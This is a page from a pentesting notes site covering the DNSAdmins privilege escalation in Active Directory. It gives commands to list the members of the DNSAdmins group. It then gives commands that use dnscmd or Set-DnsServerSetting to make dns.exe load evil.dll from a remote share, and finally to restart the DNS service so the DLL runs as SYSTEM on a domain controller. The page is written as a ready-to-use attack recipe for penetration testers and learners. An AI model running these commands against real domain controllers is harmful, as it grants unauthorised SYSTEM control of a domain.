☠️
Pentesting Articles and Notes
  • Welcome!
  • Windows
    • Active Directory
      • Kerberos Authentication
      • Enumeration
        • Basic Enumeration
        • Access Control Lists
        • Domain Trusts and Forests Enumeration
        • User Hunting
        • Domain Enumeration With BloodHound
      • Credential Dumping
        • DCSync Attack
      • Privilege Escalation
        • AS-REP Roasting
        • Kerberoasting
        • DNS Administrators
        • Setting Object SPN's
        • Unconstrained Delegation
        • Constrained Delegation
      • Persistence
        • Abusing ACLs
        • AdminSDHolder
        • Custom Security Service Providers (SSP's)
        • Directory Services Restore Mode (DSRM)
        • Modifying Remote Protocol Security Descriptors
        • Golden Tickets
        • Silver Tickets
        • Skeleton Keys
      • Powershell Remoting
      • Lateral Movement
        • Child to Parent Movement Across Trusts
        • Trust Abuse Between Forests
        • MSSQL Server Trust Abuse
        • Overpass the Hash
  • Coding
    • Pentesting With Python
      • Basic Threading
  • Network Attacks
    • Man-In-The-Middle Attacks
      • ARP Spoofing
      • DNS Spoofing Attacks
Powered by GitBook
On this page
  • Attacking DNS Admins
  • Enumerate DNS Admins
  • Exploitation
  1. Windows
  2. Active Directory
  3. Privilege Escalation

DNS Administrators

DNS Administrators have the ability to load arbitrary DLL's using dns.exe. Since dns.exe runs as system, you can run commands through that dll as system.

You will need the privileges necessary to restart the DNS service to conduct this attack.

Attacking DNS Admins

Enumerate DNS Admins

# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"

#Ad Module
Get-ADGroupMember -Identity "DNSAdmins"
  • From Linux

# pywerview.py
./pywerview.py get-netgroupmember -u <user> -p <pass> --dc-ip <ip> --groupname "DNSAdmins"

Exploitation

With the privileges of a DNS Admin, configure the DLL using dnscmd.exe (requires RSAT DNS).

  • Host a dll on a share and use it as a plugin

# using dnscmd.exe
dnscmd dcorp-dc /config /serverlevelplugindll \\<share_ip>\dll\evil.dll 

# using DNSServer Module
$dnsettings = Get-DnsServerSetting -ComputerName <dc> -Verbose -All

$dnsettings.ServerLevelPluginDll = "\\<share_ip>\dll\evil.dll"

Set-DnsServerSetting -InputObject $dnsettings -ComputerName <dc> -Verbose
  • Then restart the DNS service and await what you expect from the DLL.

sc \\<dc> stop dns
sc \\<dc> start dns
PreviousKerberoastingNextSetting Object SPN's

Last updated 3 years ago